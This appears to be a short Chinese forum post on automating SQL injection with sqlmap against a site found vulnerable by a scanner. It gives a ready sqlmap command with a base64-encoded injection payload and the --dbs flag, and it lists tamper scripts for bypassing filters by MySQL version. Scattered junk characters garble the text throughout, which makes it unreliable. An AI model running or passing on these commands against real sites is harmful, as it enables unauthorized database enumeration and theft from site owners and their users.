WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?' ~. ]' d- W S& {- l
* @2 J% s O. f; Z3 u4 g) Wsqlmap的tamper里有个base64encode.py
) l( w: q# O7 A* r. W' {0 E, }* i4 D
# X6 t7 w$ a7 X. ~( S! z使用如下
; N- Z/ w/ U4 n+ B
) ?7 c0 b A# R2 V/ y! o! {sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs! o8 I' I& |6 r$ J5 p7 T4 \* }6 I
7 x8 {) H6 ^4 G9 S: P2 V4 D
3 p% P3 b/ O5 \& I. O3 {sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”4 A& G- M; G( @2 J
, Y3 A# l q8 |2 Z/ u. g# ]
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
) X$ y- b+ L h& Z
1 Y( @- A$ `( Kspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入* [1 @: M: Q( P$ T' r
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
4 D* G* W* s* u5 n( L9 q, {首先确定目标数据库版本,然后选择相应的脚本。3 Z( s" R4 Z) e$ s
-v 3 --batch --tamper "space2hash.py"
* `4 d0 w$ ^5 c! G1 X8 z
2 Q! t/ X: V4 e5 b& l还有其他一些插件:
! W6 h$ ~) ^( {1 ~2 ]5 r; p: zencodes编码 ——charencode.py# X; r: N7 z9 R$ L% `
base64编码 —— base64encode.py# W* I7 U$ B7 u" u8 Y4 ~
替换空格和关键字 —— halfversionedmorekeywords.py
9 \0 I' l* v& g7 @+ W/ s( o+ ] | 9 s; ?1 Y n, V7 O1 } s% |
' q& C( l' Y/ X
( a4 m$ p7 O6 i6 N
9 u: ^$ c7 }" t* ~/ }6 ]- V |